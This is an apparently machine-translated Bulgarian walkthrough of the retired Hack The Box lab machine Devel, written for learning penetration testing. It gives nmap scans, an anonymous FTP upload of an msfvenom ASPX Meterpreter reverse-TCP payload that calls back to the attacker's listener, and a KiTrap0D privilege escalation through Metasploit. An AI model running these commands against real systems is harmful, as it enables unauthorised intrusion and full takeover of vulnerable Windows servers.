Бъдете спокойни и хакнете кутията - Devel

Hack The Box (HTB) е онлайн платформа, която ви позволява да тествате уменията си за тестване на проникване. Той съдържа няколко предизвикателства, които непрекъснато се актуализират. Някои от тях симулират сценарии от реалния свят, а някои от тях са склонни повече към CTF стил на предизвикателство.

Забележка . Разрешени са само записвания на оттеглени HTB машини.

Devel се описва като относително просто поле, което демонстрира рисковете за сигурността, свързани с някои конфигурации на програмата по подразбиране. Това е машина за начинаещи, която може да бъде завършена с публично достъпни експлойти.

Ще използваме следните инструменти, за да заложим кутията на кутия на Kali Linux

  • nmap
  • zenmap
  • searchsploit
  • метасплойт
  • msfvenom

Стъпка 1 - Сканиране на мрежата

Първата стъпка преди експлоатация на машина е да направите малко сканиране и разузнаване.

Това е една от най-важните части, тъй като ще определи какво можете да опитате да използвате след това. Винаги е по-добре да отделите повече време за тази фаза, за да получите възможно най-много информация.

Ще използвам Nmap (Network Mapper), която е безплатна помощна програма с отворен код за откриване на мрежа и одит на сигурността. Той използва сурови IP пакети, за да определи кои хостове са достъпни в мрежата, какви услуги предлагат тези хостове, какви операционни системи изпълняват, какъв тип пакетни филтри / защитни стени се използват и десетки други характеристики.

Има много команди, които можете да използвате с този инструмент за сканиране на мрежата. Ако искате да научите повече за това, можете да разгледате документацията тук.

Използвам следната команда, за да получа основна представа за това, което сканираме

nmap -sV -O -F --version-light 10.10.10.5

-sV: Проверете отворени портове, за да определите информация за услугата / версията

-O: Активиране на откриването на OS

-F: Бърз режим - Сканирайте по-малко портове от сканирането по подразбиране

--version-light: Ограничаване до най-вероятните сонди (интензитет 2)

10.10.10. 5 : IP адрес на полето Devel

Можете също да използвате Zenmap , който е официалният графичен интерфейс на Nmap Security Scanner. Това е мултиплатформено, безплатно приложение с отворен код, което има за цел да направи Nmap лесен за начинаещи, като същевременно предоставя разширени функции за опитни потребители на Nmap.

Използвам различен набор от команди за извършване на интензивно сканиране

nmap -A -v 10.10.10.5

-A: Активирайте откриването на OS, откриването на версията, сканирането на скриптове и трасето

-v: Увеличете нивото на многословие

10.10.10.5: IP адрес на полето Devel

Ако намерите резултатите за малко поразителни, можете да преминете към раздела Портове / хостове, за да получите само отворените портове.

Виждаме, че има 2 отворени порта:

Порт 21 . Контрол (команда) на File Transfer Protocol (FTP). Тук става въпрос за Microsoft FTP

Порт 80 . Протокол за прехвърляне на хипертекст (HTTP). Тук това е IIS сървър

Най-вероятният първоначален вектор на атака изглежда FTP в този случай

Стъпка 2 - Уязвимият FTP

Отваряме Firefox и посетете уеб сайта на //10.10.10.5

От фазата на разузнаването открихме 2 файла под Microsoft FTP. Да видим дали можем да имаме достъп до тях от браузъра.

Мога да вляза в файла с изображения на welcome.png, като посетя

//10.10.10.5/welcome.png

Също така мога да вляза в страницата iisstart.htm

//10.10.10.5/iisstart.htm

Сега знаем две неща:

  • FTP се използва като файлова директория за уеб сървъра - открива се, когато имаме достъп до файловете от фазата на възстановяване.
  • FTP позволява анонимно влизане - открито, когато извършихме интензивното сканиране.

Нека видим дали можем да създадем файл и да го добавим към FTP

Създавам файл с помощта на тази команда и извеждам резултата във файл, наречен htb.html

echo HackTheBox > htb.html

След това проверявам с ls дали файлът е създаден и какво е съдържанието на файла с тази команда

cat htb.html

Нека сега се свържем с FTP, за да добавим нашия тестов файл

За да се свържа с FTP, използвам тази команда

ftp 10.10.10.5

Въвеждам анонимно като потребителско име и просто натискам enter за паролата, тъй като позволява анонимно влизане.

Сега съм свързан с FTP.

Добавям файла на FTP с тази команда

put htb.html

Файлът е изпратен успешно. Нека проверим дали имаме достъп до него от Firefox. Посещавам страницата и можем да видим изхода HackTheBox на уеб страницата.

//10.10.10.5/htb.html

Сега, когато знаем, че можем да изпращаме файлове, нека създадем експлойт!

Стъпка 3 - Използване на MSFvenom за създаване на експлойт

Ще използваме MSFvenom, който е генератор на полезен товар. Можете да научите повече за това тук

Но първо, нека проверим на Metasploit Framework кой полезен товар ще ни е необходим, за да създадем своя експлойт.

Знаем, че трябва да създадем обратна обвивка , която е вид обвивка, в която целевата машина комуникира обратно с атакуващата машина. Атакуващата машина има порт за слушател, на който получава връзката, което чрез използване, изпълнение на код или команда се постига.

Обратната обвивка на TCP трябва да е за Windows и ще използваме Meterpreter .

От уебсайта Offensive Security получаваме тази дефиниция за Meterpreter

Meterpreter е усъвършенстван, динамично разширяем полезен товар, който използва вградени в паметта DLL инжектори и се разширява по мрежата по време на изпълнение. Той комуникира през сокера на стагера и предоставя изчерпателен Ruby API на клиента. Той включва история на командите, завършване на раздела, канали и др.

Можете да прочетете повече за Meterpreter тук.

Стартирам Metasploit и търся обратни TCP полезни товари. Използвам следната команда

search windows/meterpreter/reverse_tcp

Намираме интересен полезен товар, номер 2, който е обратен TCP Stager .Този полезен товар инжектира DLL на сървъра на meterpreter чрез полезния товар Reflective Dll Injection и се свързва обратно с нападателя

payload/windows/meterpreter/reverse_tcp

Сега да се върнем към msfvenom, за да създадем експлоата си. И по-точно обратна обвивка на aspx . Тази информация е събрана по време на фазата на възстановяване

Използвам следната команда

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : полезен товар за използване

- f : Изходен формат

- 0 : Запазване на полезния товар във файл

LHOST : Локален хост

LPORT : Местен порт

След това проверявам с ls дали файлът е създаден. Време е да го изпратите на FTP

Нека да се свържем отново с FTP и да изпратим нашия малък подарък!

Свързвам се с FTP, въвеждам анонимен като потребителско име, пропускам паролата, като натискам enter. След това изпращам файла със следната команда

put devel.aspx

Нека проверим дали файлът е изпратен правилно. Връщайки се към Firefox , придвижвам се до FTP сървъра със следната команда

ftp://10.10.10.5

Виждаме, че нашият малък подарък е тук!

Ето експлоата, ако ви е интересно да разберете как изглежда

Стъпка 4 - Настройка на слушател с Metasploit

Обратно на Metasploit, където използвам следната команда, за да задам манипулатора на полезния товар

use exploit/multi/handler

Проверявам дали има опции

Първо настроихме полезния товар

set payload windows/meterpreter/reverse_tcp

Тогава НАЙ-ГОСТ

set lhost 10.10.14.15

И накрая LPORT

set lport 4444

Ако проверим опциите сега, трябва да видим, че всичко е настроено

Нека пуснем експлоата.

След като се появи това съобщение

Started reverse TCP handler on 10.10.14.15:4444

върнете се в браузъра и отворете страницата, където се хоства злонамереният скрипт

//10.10.10.5/devel.aspx

След това трябва да видите създадена сесия на Meterpreter

Сега, когато имам сесия, се опитвам да потърся първия флаг user.txt, използвайки следната команда на meterpreter

search -f user.txt

Няма файлове, които отговарят на търсенето ми. Опитвам се с. * Да видя други файлове, но нищо полезно

След това създавам черупка със следната команда

shell

Използвам следната команда, за да получа системната информация

systeminfo

Виждаме, че регистрираният собственик се нарича babis . Това може да е важна информация, когато ще търсим флага на потребителя. Също така виждаме, че машината няма актуални корекции.

Започвам да навигирам из папките. Използвам dir, за да изброя всички файлове / папки и cd, за да променя директорията. Опитвам късмета си в папките babis и Administrator , но и двете ми отказаха достъп.

Трябва да ескалираме привилегията! Знаейки, че когато проверихме за системна информация, не бяха намерени спешни корекции, можем да се опитаме да намерим експлойти, приложими за тази машина.

Стъпка 5 - Извършване на привилегирована ескалация

С тази команда поставих сесията на заден план

background

След това използвам следната команда

use post/multi/recon/local_exploit_suggester

Този модул предлага локални експлойти на Meterpreter, които могат да бъдат използвани. Експлойтите се препоръчват въз основа на архитектурата и платформата, че потребителят има отворена черупка, както и наличните експлойти в Meterpreter

Проверявам опциите и настройвам сесията

Важно е да се отбележи, че не всички местни подвизи ще бъдат изстреляни. Експлойти се избират въз основа на тези условия: тип сесия, платформа, архитектура и необходимите опции по подразбиране

Слизане по списъка

exploit/windows/local/bypassuac_eventvwr

се проваля, защото потребителят на IIS не е част от групата на администраторите, което е по подразбиране и се очаква.

Използвам следващия експлойт в списъка, който е

use exploit/windows/local/ms10_015_kitrap0d

Този модул ще създаде нова сесия със СИСТЕМНИ привилегии чрез KiTrap0D експлойт от Tavis Ormandy. Ако използваната сесия вече е повишена, експлойтът няма да се изпълни. Модулът разчита на kitrap0d.x86.dll и не се поддържа в x64 издания на Windows.

Когато стартирахме sysinfo в сесията на Meterpreter, тя разкри, че целта е архитектура x86

Проверявам опциите и след това задавам сесията

Аз управлявам експлоата.

Експлойтът беше успешен, но сесията не можа да бъде създадена. Това се дължи на първия ред в експлоата, който се опитва да настрои обратен манипулатор по подразбиране eth0 и порт по подразбиране, а не VPN интерфейс за HTB лаборатории.

Started reverse TCP handler on 10.0.2.15:4444

Проверявам опциите и настройвам LHOST и LPORT

След това проверявам всички сесии живи със следната команда, в случай че сесията ми умре

sessions -l

Мога да видя сесията си

Сега, след като имаме сесия на meterpreter, нека започнем да навигираме в папката и да намерим флаговете!

Стъпка 6 - Търсите знамето user.txt

Нека първо проверим къде се намираме със следната команда

pwd

което означава щампа за печат

Отивам до C: \ и ли всички файлове / папки. Вече знам къде да търся от предишния ми опит в Стъпка 4 - Настройка на слушател с Metasploit

Връщам се в директорията Потребители

След това преминете към директорията babis

Оттам отивам в директорията на работния плот

Намерихме файла user.txt.txt ! За да прочета съдържанието на файла, използвам командата

cat user.txt.txt

Сега, когато имаме потребителски флаг, нека намерим основния флаг!

Стъпка 7 - Търсене на флага root.txt

Връщайки се към C: \, за да отидете до папката " Администратор ", след това към папката " Работен плот " Използвам ls, за да изброя всички файлове под папката Desktop

Намираме файла root.txt.txt !

За да прочета съдържанието на файла, използвам командата

cat root.txt.txt

Поздравления! Намерихте и двата знамена!

Моля, не се колебайте да коментирате, да задавате въпроси или да споделяте с приятелите си :)

Можете да видите повече от моите статии тук

Можете да ме следвате в Twitter или в LinkedIn

И не забравяйте да # GetSecure , # BeSecure & # StaySecure !

Други статии за Hack The Box

  • Бъдете спокойни и хакнете кутията - куца
  • Бъдете спокойни и хакнете кутията - наследство
  • Бъдете спокойни и хакнете кутията - Бип